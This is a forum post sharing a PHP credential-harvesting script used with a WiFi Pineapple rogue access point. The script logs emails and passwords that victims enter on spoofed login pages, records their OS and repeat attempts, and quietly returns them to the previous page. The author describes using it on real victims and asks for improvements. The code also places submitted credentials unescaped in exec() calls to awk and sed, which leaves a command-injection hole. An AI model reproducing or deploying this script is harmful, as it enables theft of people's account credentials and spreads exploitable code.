NullNull Posted July 22, 2013 (edited)

Hello guys, I just want to share the error.php file I am using... It's nothing special since my knowledge in PHP is limited, but here it is.

When I use the pineapple in real action it doesn't have an internet connection, so the "date("G:i:s")" command (line 3) shows the "up time" of the pineapple.

The original error.php was posting the entire URL to phish.log, which in my case was something like this: http://www.blabla.com/web/files/example1/example1.html. I didn't like the output of that, so I added the first "if", which changes the final output to this: " hh:mm:ss -- Example 1 -- email -- password"

I noticed that when the victim could not establish an internet connection he was pressing the "Log in" button again and again without typing the password, and because I don't think someone has a blank password on the websites I "phish", I added the "&& !empty($_POST['pass'])" (line 14) so it won't log any data with a blank password.

Also, not having an internet connection, the victim was trying again and again with the same credentials, leading to long and difficult-to-read logs.
For this reason I added the third "if".

EDIT:
Added $_SERVER["HTTP_USER_AGENT"], which detects the client's OS
Counting how many times the victim uses the same combination email/password

```php
<?php

$uptime = date("G:i:s");

/* =========== Detect the Phishing Page =========== */
$ref = $_SERVER['HTTP_REFERER'];

if (strpos($ref, "example1")){
    $page = "Example 1";
} elseif (strpos($ref, "example2")){
    $page = "Example 2";
}
/* ================================================ */

/* ================= Detect the OS ================ */
$ua = $_SERVER["HTTP_USER_AGENT"];
$platform = "Unknown";

if (strpos($ua, "Android")) {
    $platform = "Android";
} elseif (strpos($ua, "iPhone")) {
    $platform = "iPhone";
} elseif (strpos($ua, "Windows")) {
    $platform = "Windows";
} elseif (strpos($ua, "BlackBerry")) {
    $platform = "BlackBerry";
} elseif (strpos($ua, "Linux")) {
    $platform = "Linux";
} elseif (strpos($ua, "Macintosh")) {
    $platform = "Macintosh";
}
/* ================================================ */

/* ====================== Checking and Saving Data =============================== */
if (isset($_POST['email']) && !empty($_POST['email']) && !empty($_POST['pass'])) {
    $nam = stripslashes($_POST['email']);
    $pas = stripslashes($_POST['pass']);
    $nam = htmlspecialchars($nam, ENT_QUOTES);
    $pas = htmlspecialchars($pas, ENT_QUOTES);
    $cre = $page . " -- ". $nam . " -- " . $pas;
    $file = file_get_contents("/pineapple/phish.log");
    $count = 1;

    if (!strpos($file, $cre)) {
        $content = $cre . " -- " . $count . " -- " . $platform . " -- " . $uptime;
        $filed = @fopen("/pineapple/phish.log", "a+");
        @fwrite($filed, $content."\n");
        @fclose($filed);
    } else {
        $count = exec("awk -F ' -- ' '$0 ~ str{print substr($4,1)}' str='$cre ' /pineapple/phish.log");
        $count = $count + 1;
        exec("sed '/$cre /c \\$cre -- $count -- $platform -- $uptime' -i /pineapple/phish.log");
    }
}
/*================================================================================ */
?>
<html><head>
<script type="text/javascript">
function goBack() { window.history.back() }
</script>
</head>
<body onload="goBack()">
</body></html>
```

I am sure there is a much better and cleaner way to do all this, but that's all I got :P. Any suggestions and changes are of course welcome.

Edited August 7, 2013 by KiatoG